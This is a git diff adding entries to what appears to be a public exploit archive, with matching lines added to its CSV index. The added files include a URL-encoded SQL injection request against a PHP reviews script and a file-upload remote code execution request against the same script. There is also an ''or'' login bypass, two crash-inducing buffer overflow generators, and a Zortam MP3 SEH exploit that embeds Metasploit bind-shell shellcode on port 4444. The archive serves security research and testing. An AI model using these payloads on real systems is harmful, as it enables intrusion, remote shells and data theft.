index 000000000..7cbefe60d
--- /dev/null
+++ b/exploits/php/webapps/45992.html
@@ -0,0 +1,20 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery
+# Date: 2018-12-13
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+
+# 1 Poof Of Concept (Change password):
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45994.txt b/exploits/php/webapps/45994.txt
new file mode 100644
index 000000000..d8d310847
--- /dev/null
+++ b/exploits/php/webapps/45994.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+#
+
+GET /[PATH]/reviews/campaign_add.php?id=%2d%31%27%20%20%55%4e%49%4f%4e+%53%45%4c%45%43%54+1,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29,3,4,5,%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33,24,25,%32%36%2c%32%37%2c%32%38%2c%32%39,30--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:09:22 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45995.txt b/exploits/php/webapps/45995.txt
new file mode 100644
index 000000000..705f14ef2
--- /dev/null
+++ b/exploits/php/webapps/45995.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+#
+
+POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/octet-stream
+Content-Length: 922
+Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------4704926813981: undefined
+Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
+
+-----------------------------4704926813981
+Content-Disposition: form-data; name="hidden_photo"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="name"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="rating"
+4.5
+-----------------------------4704926813981
+Content-Disposition: form-data; name="review"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="date"
+12/14/2018
+-----------------------------4704926813981
+Content-Disposition: form-data; name="id"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="submit"
+submit
+-----------------------------4704926813981--
+HTTP/1.1 302 Found
+Date: Fri, 14 Dec 2018 18:17:48 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: custom_reviews.php
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/reviews/custom_reviews.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:17:49 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45997.txt b/exploits/php/webapps/45997.txt
new file mode 100644
index 000000000..2823943c2
--- /dev/null
+++ b/exploits/php/webapps/45997.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
+# Date: 2018-12-08
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+http://traget/admin/index.php
+
+username: '=''or'
+
+Password: '=''or'
\ No newline at end of file
diff --git a/exploits/windows/dos/45993.py b/exploits/windows/dos/45993.py
new file mode 100755
index 000000000..ef7ea778f
--- /dev/null
+++ b/exploits/windows/dos/45993.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python
+# -*- coding: cp1252 -*-
+# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
+# Author: Fernando Cruz
+# Date: 13/12/2018
+# Vendor Homepage: https://angryip.org
+# Tested Version: 3.11
+# Tested on Windows 10 Pro, 64-bit
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python angryip.py
+# 2.- Open angryip.txt and copy content to clipboard
+# 3.- Open Angry IP Scanner
+# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
+# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
+# 6.- Crashed
+
+buffer = "\x41" * 44455293
+f = open("angryip.txt" , 'w')
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/45996.py b/exploits/windows/dos/45996.py
new file mode 100755
index 000000000..b230798ea
--- /dev/null
+++ b/exploits/windows/dos/45996.py
@@ -0,0 +1,27 @@
+# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
+# Discovery by: Francisco Ramirez
+# Discovery Date: 2018-12-14
+# Vendor Homepage: https://www.ultraiso.com/
+# Software Link : https://www.ultraiso.com/download.html
+# Tested Version: 9.7.1.3519
+# Tested on: Windows 10 Pro - 64 bit
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python UltraISO_9.7.1.3519.py
+# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
+# 3.- Open UltraISO_9.7.1.3519
+# 4.- In the Window select 'Tools' > 'Make CD/DVD Image'
+# 5.- In the field 'Output FileName' remove the default path.
+# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
+# 7.- Click 'Make' and you will see a crash.
+
+#!/usr/bin/env python
+
+a_letters = "\x41" * 304
+seRecord = "\x42" * 4
+sehRecord = "\x43" * 4
+buffer = a_letters + seRecord + sehRecord
+f = open ("UltraISO_9.7.1.3519.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/45988.py b/exploits/windows/local/45988.py
new file mode 100755
index 000000000..12fc88a39
--- /dev/null
+++ b/exploits/windows/local/45988.py
@@ -0,0 +1,89 @@
+#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
+#Version: 24.15
+#Exploit Author: Manpreet Singh Kheberi
+#Date: December 13 2018
+#Download Link: https://www.zortam.com/download.html
+#Vendor Homepage: https://www.zortam.com
+#Tested on: Windows Xp Sp3 x64
+#Type: Bind shell
+print "-----------------------------------------------------------------------------------------------------------------------"
+print " Zortam MP3 media studio Exploit (SEH) "
+print " by Manpreet Singh Kheberi "
+print "Generated File zortam-exploit.txt "
+print "INSTRUCTIONS:"
+print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
+print "-----------------------------------------------------------------------------------------------------------------------"
+
+
+filename = "zortam-exploit.txt"
+junk = "\x41"*268
+nseh="\x90\x90\xeb\x12"
+
+seh ="\x8e\x32\xb5\x02"
+
+nop="\x90"*19
+brk="\x90\x90\x90\x90"
+
+# bind shell generated using metasploit
+#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
+# This will open a bind shell on port 4444
+# use ncat Target-IP 4444
+
+buf = ""
+buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33"
+buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30"
+buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26"
+buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb"
+buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f"
+buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7"
+buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35"
+buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad"
+buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d"
+buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33"
+buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79"
+buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d"
+buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1"
+buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed"
+buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e"
+buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd"
+buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35"
+buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4"
+buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69"
+buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29"
+buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3"
+buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09"
+buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4"
+buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f"
+buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0"
+buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c"
+buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12"
+buf += "\x68\x33\x89\x37"
+
+#boom+= "\xCC\xCC\xCC\xCC"
+#calc.exe
+
+
+# Used for initial exploit development phase
+bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
+bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
+bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
+bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
+bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
+bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
+bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
+bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
+bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
+bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
+bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
+bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
+bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
+bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
+bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
+bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
+
+
+
+exploit = junk+nseh+seh+nop+brk+buf
+textfile = open(filename,"w")
+textfile.write(exploit)
+textfile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fa00ac936..8bc6ca9b2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6212,6 +6212,8 @@ id,file,description,date,author,type,platform,port
45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows,
45983,exploits/linux/dos/45983.txt,"Linux - 'userfaultfd' Bypasses tmpfs File Permissions",2018-12-13,"Google Security Research",dos,linux,
45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
+45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
+45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10145,6 +10147,7 @@ id,file,description,date,author,type,platform,port
45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
+45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17002,6 +17005,8 @@ id,file,description,date,author,type,platform,port
45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
+45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
+45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38035,7 +38040,7 @@ id,file,description,date,author,type,platform,port
43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
-43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
+43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
@@ -40480,3 +40485,11 @@ id,file,description,date,author,type,platform,port
45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80
45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,
+45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,
+45989,exploits/multiple/webapps/45989.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure",2018-12-14,alt3kx,webapps,multiple,
+45990,exploits/multiple/webapps/45990.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)",2018-12-14,alt3kx,webapps,multiple,
+45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,
+45992,exploits/php/webapps/45992.html,"Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)",2018-12-14,Veyselxan,webapps,php,
+45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
+45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
+45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,